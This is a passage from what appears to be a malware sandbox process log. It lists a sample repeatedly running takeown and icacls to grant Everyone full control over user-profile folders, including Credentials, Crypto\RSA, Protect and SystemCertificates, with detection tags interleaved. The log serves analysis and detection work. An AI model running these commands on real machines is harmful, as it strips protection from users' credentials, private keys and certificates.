C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\6 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\603⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\60 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\613⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\61 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\623⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\62 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\633⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\63 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\73⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\7 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\83⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\8 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\93⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\9 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\host /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\muffin /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64 && icacls C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x643⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming && icacls C:\Users\Admin\AppData\Roaming /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe && icacls C:\Users\Admin\AppData\Roaming\Adobe /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat && icacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0 && icacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.03⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab && icacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\Collab /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\Z257BEVQ && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\Z257BEVQ /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\AssetCache\Z257BEVQ3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache && icacls C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Adobe\Flash Player\NativeCache3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Identities && icacls C:\Users\Admin\AppData\Roaming\Identities /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Identities3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Identities /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Identities\{977286EF-87A2-462A-9E5B-C27B251936D9} && icacls C:\Users\Admin\AppData\Roaming\Identities\{977286EF-87A2-462A-9E5B-C27B251936D9} /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Identities\{977286EF-87A2-462A-9E5B-C27B251936D9}3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Identities\{977286EF-87A2-462A-9E5B-C27B251936D9} /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia && icacls C:\Users\Admin\AppData\Roaming\Macromedia /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Macromedia /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HEWG38XS && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HEWG38XS /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\#SharedObjects\HEWG38XS3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys && icacls C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Media Center Programs && icacls C:\Users\Admin\AppData\Roaming\Media Center Programs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Media Center Programs3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft && icacls C:\Users\Admin\AppData\Roaming\Microsoft /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\AddIns && icacls C:\Users\Admin\AppData\Roaming\Microsoft\AddIns /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\AddIns3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\AddIns /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Credentials && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Credentials /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Credentials3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Credentials /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000 && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-10003⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312935884-697965778-3955649944-1000 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Excel && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Excel /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Excel3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Excel /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\UserData\Low3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Office /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Office /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-312935884-697965778-3955649944-1000 && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-312935884-697965778-3955649944-1000 /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-312935884-697965778-3955649944-10003⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-312935884-697965778-3955649944-1000 /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs /grant everyone:(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs && icacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Templates && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Templates /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Templates3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Templates /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies /grant everyone:(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low /grant everyone:(f)2⤵
-
C:\Windows\system32\takeown.exetakeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low3⤵
-
-
C:\Windows\system32\icacls.exeicacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\Low /grant everyone:(f)3⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException && icacls C:\Users\Admin\AppData\Roaming\Microsoft\Windows\DNTException /grant everyone:(f)2⤵
-
